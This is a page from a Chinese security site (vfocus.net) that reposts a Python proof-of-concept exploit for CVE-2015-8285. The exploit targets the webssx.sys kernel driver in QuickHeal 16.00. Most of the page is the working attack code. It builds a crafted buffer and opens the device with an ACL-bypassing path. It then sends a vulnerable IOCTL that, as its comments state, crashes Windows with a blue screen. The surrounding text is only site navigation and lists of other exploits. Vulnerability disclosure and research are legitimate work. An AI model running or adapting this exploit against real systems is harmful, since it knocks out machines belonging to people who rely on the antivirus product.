首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
QuickHeal 16.00 - webssx.sys Driver DoS Vulnerability
来源:vfocus.net 作者:Csaba 发布时间:2016-02-22  
# Exploit Title: QuickHeal webssx.sys driver DOS vulnerability
# Date: 19/02/2016
# Exploit Author: Csaba Fitzl
# Vendor Homepage: http://www.quickheal.co.in/
# Version: 16.00
# Tested on: Win7x86, Win7x64
# CVE : CVE-2015-8285
 
from ctypes import *
from ctypes.wintypes import *
import sys
 
kernel32 = windll.kernel32
ntdll = windll.ntdll
 
#GLOBAL VARIABLES
 
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
STATUS_SUCCESS = 0
 
def alloc_in(base,evil_size):
    """ Allocate input buffer """
    print "[*] Allocating input buffer"
    baseadd   = c_int(base)
    size = c_int(evil_size)
    evil_input = "\x41" * 0x10
    evil_input += "\x42\x01\x42\x42" #to trigger memcpy
    evil_input += "\x42" * (0x130-0x14)
    evil_input += "\xc0\xff\xff\xff" #this will cause memcpy to fail, and trigger BSOD
    evil_input += "\x43" * (evil_size-len(evil_input))
    ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
                                              POINTER(c_int), c_int, c_int]
    dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0,
                                             byref(size),
                                             MEM_RESERVE|MEM_COMMIT,
                                             PAGE_EXECUTE_READWRITE)
    if dwStatus != STATUS_SUCCESS:
        print "[-] Error while allocating memory: %s" % hex(dwStatus+0xffffffff)
        sys.exit()
    written = c_ulong()
    alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base, evil_input, len(evil_input), byref(written))
    if alloc == 0:
        print "[-] Error while writing our input buffer memory: %s" %\
            alloc
        sys.exit()
 
if __name__ == '__main__':
    print "[*] webssx BSOD"
     
    GENERIC_READ  = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    IOCTL_VULN  = 0x830020FC
    DEVICE_NAME   = "\\\\.\\webssx\some" #add "some" to bypass ACL restriction, (FILE_DEVICE_SECURE_OPEN is not applied to the driver)
    dwReturn      = c_ulong()
    driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
 
    inputbuffer    = 0x41414141 #memory address of the input buffer
    inputbuffer_size  = 0x1000
    outputbuffer_size = 0x0
    outputbuffer      = 0x20000000
    alloc_in(inputbuffer,inputbuffer_size)
    IoStatusBlock = c_ulong()
    if driver_handle:
        print "[*] Talking to the driver sending vulnerable IOCTL..."
        dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle,
                                       None,
                                       None,
                                       None,
                                       byref(IoStatusBlock),
                                       IOCTL_VULN,
                                       inputbuffer,
                                       inputbuffer_size,
                                       outputbuffer,
                                       outputbuffer_size
                                       )
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·STIMS Cutter - Buffer Overflow
·Adobe Cross Site Scripting / O
·STIMS Buffer - Buffer Overflow
·Core FTP Server 1.2 - Buffer O
·XM Easy Personal FTP Server 5.
·libquicktime 1.2.4 - Integer O
·Inductive Automation Ignition
·Linux io_submit L2TP Sendmsg I
·Inductive Automation Ignition
·Proxmox VE 3/4 Insecure Hostna
·Network Scanner Version 4.0.0.
·GpicView 0.2.5 - Crash PoC
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved